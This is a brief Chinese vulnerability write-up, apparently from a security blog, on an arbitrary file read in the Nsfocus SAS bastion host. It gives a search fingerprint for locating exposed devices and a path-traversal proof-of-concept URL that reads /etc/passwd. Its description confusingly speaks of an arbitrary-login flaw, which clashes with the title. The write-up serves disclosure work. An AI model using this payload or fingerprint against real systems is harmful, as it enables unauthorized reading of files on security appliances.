Nsfocus SAS堡垒机 GetFile 任意文件读取漏洞
# Nsfocus SAS堡垒机 GetFile 任意文件读取漏洞
## 漏洞描述
Nsfocus堡垒机存在任意用户登录漏洞,攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录
## 漏洞影响
Nsfocus S...
Nsfocus SAS堡垒机 GetFile 任意文件读取漏洞
漏洞描述
Nsfocus堡垒机存在任意用户登录漏洞,攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录
漏洞影响
Nsfocus SAS堡垒机
网络测绘
body="'/needUsbkey.php?username='"
漏洞复现
登陆页面
漏洞存在于文件 GetFileController.php 文件中
验证POC
/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd
- 发表于 2024-07-12 18:46:31
- 阅读 ( 1985 )
- 分类:Web应用
带头大哥
456 篇文章